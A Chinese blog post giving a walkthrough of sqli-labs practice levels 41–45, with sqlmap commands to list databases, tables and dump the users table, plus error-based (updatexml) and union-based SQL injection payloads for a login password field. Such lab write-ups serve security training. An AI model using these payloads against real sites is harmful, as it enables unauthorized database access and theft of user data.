sqli-labs靶场通关攻略(41-45关)

于 2024-08-28 19:46:36 发布
阅读量239 收藏 1
点赞数 10
文章标签: oracle 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141644267
版权

第41关

这关我们使用工具sqlmap练习一下(这里如果用本机的回环地址访问靶场的话只能在你的本机访问,因为我们是在虚拟机上进行扫描,所以不能使用127.0.0.1访问)

进入虚拟机kali,打开终端

查库

sqlmap -u 网址 -- current-db

查表

-D 库名 --tables

查数据

-D security -T users --dump

第42关

进入后登录页面然后在密码框进行注入

查数据库

'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

查表名

'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

查列

'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) -- aaa

第43关

还是在登录页面的密码框注入

查数据库

') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa

查表

') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa

查列

') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa

第44关

这关也是在登录页面的密码框里进行输入

查库

1' union select 1,database(),3 #

查表

1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

查列

1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

第45关

登录页面密码框里进行输入

查库

1') union select 1,database(),3 #

查表

1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

查列

1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #

嘤嘤奶嘴酱
关注
  • 10
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1573
这一在web应用前有一个waf,在卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3662
sqli-labs靶场通关(1-10)
Sqli-labs靶场1-20通关宝典
2203_75440207的博客
05-18 2062
本文章主要是sqli-labs靶场1-20通关方法
SQL注入:sqli-labs靶场通关(1-37
qq_68163788的博客
02-03 6595
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Sqli-labs靶场通关(1-20
2301_77977773的博客
07-03 407
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqli-labs靶场第一详解
qq_43784516的博客
01-28 1432
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs靶场通关秘籍分享(1-10
weixin_45585955的博客
04-16 2673
一、 1、SQL注入原理:sql语句未经查询直接带入数据库查新,sql注入攻击其实就是服务端的攻击,它与操作系统、服务器类型、脚本语言无 2、sql注入类型:分为数字型、字符型、搜索型、xx型 3、注入提交方式:get提交、post提交、cookie提交。 4、注入攻击提交支持的类型 union注入、information_schema、宽字节注入、报错注入、盲注,这里的盲注分为三种,分别是 布尔型盲注、时间型盲注、报错型盲注。 updatexml注入分为 insert注入、update注入
sqli-labs靶场通关
wh15320219935的博客
08-05 1017
根据php文件可以看出是进行单引号逃脱加上注释符,有--+ 或者#然后我们可以进行字段数查找使用order by进行查询最大字段数,当输入4的时候发现报错证明最大值为3接下来我们可以使用联合查询union select发现与之前没有任何变化,此时我们可以观察代码发现他只取第一行,所以我们可以让第一个表查询为空,同时可以查询数据库中的一些数据名知道当前的用户权限和库名以后我们就可以进行注入管理员账号密码,想要知道管理员账号密码我们还得需要知道数据库的表名和列名。
SQL注入之SQLI-LABS靶场通关秘籍
Sunnie_yoo的博客
07-03 1037
反之,参数不符合规范,则会触发报错,我们就是利用这个,通过 updatexml() 函数的报错回显我们需要的信息。注入流程与 Less-5 类似,不过这里的判断标准不是回显的信息,而是响应时间。因此网页存在字符型注入漏洞,并且使用单引号和括号进行闭合,注意到此网页并没有返回任何信息,我们需要使用 Bool 盲注进行注入。注入万能密码试试,用户名随便写点东西,使用 OR 运算符构造恒真条件,使用“#”注释掉后面的内容注入,网页提示我们注入成功,由于此时使用的时单引号闭合,因此这里是字符型注入。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1293
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1701
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 597
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
Sqli-labs靶场第21、22详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 975
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
数据库-建表时是否需要设置外键?有啥影响?
最新发布
qq_42631788的博客
08-27 433
设置外键适合在生产环境中,尤其是需要确保数据一致性和完整性的场景。这对数据安全、可维护性有很大帮助,但会有一定的性能开销。不设置外键适合在开发环境或特定需求场景下,例如数据迁移或需要高性能的场合。在这些情况下,数据完整性需要通过应用程序逻辑来保证,这可能增加维护的复杂性和风险。最终的选择应根据具体的业务需求、性能要求和团队的技术水平来决定。
UnQLite:多语言支持的嵌入式NoSQL数据库深入解析
Where there is life, there is hope.
08-24 989
UnQLite 是一个嵌入式的NoSQL数据库引擎,提供一个无需编写复杂SQL语句的方案,支持任意形式的数据存储。对于需要频繁操作JSON数据的应用来说,UnQLite提供的JSON文档存储和读取特别方便,使得数据操作直观和高效,适合于各种嵌入式应用程序。
oracle】工具访问oracle提示-IO 错误: Got minus one from a read call
u010446835的博客
08-22 256
使用工具访问数据库时,提示IO 错误: Got minus one from a read call,在服务器上检查数据库正常,监听正常,连接数合理,防火墙没限制。最后定位sqlnet.ora配置限制了客户端访问。
MySQL入门学习-对系统数据库的常用查询
weixin_69763181的博客
08-25 393
通常情况下,MySQL 中的系统数据库有 information_schema、mysql 和 performance_schema。这些数据库提供了有数据库服务器的各种信息,例如表结构、用户权限、性能指标等。
幂等性简介
ny_forever的博客
08-25 822
数学定义:在数学中,幂等性是指一个函数f满足f(f(x)) = f(x)。计算机科学定义:在计算机科学中,幂等性是指一个操作可以重复执行多次而不会改变结。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值